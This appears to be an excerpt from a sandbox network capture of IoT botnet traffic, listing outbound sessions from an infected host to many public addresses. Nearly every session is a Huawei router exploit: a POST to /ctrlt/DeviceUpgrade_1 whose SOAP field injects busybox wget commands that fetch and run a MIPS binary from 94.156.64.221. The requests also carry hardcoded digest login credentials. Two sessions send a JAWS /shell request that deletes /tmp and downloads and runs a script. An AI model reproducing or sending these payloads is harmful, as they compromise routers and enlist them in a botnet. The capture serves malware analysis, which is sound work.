                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    363192.168.2.2354092197.165.142.23037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275662899 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    364192.168.2.2351478197.60.23.20537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275705099 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    365192.168.2.236006841.186.161.20637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275742054 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    366192.168.2.2347684197.116.0.10937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275794983 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    367192.168.2.2340262197.97.177.9137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275830030 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    368192.168.2.234584241.42.3.3737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275904894 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    369192.168.2.236089241.54.77.14837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.287412882 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    370192.168.2.2359916223.93.215.5880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.231936932 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    371192.168.2.2343444106.211.139.16180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.232017994 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    372192.168.2.2347420197.83.168.10737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.233612061 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    373192.168.2.2334658156.113.148.20237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.233750105 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    374192.168.2.2349364156.251.227.24137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.233813047 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
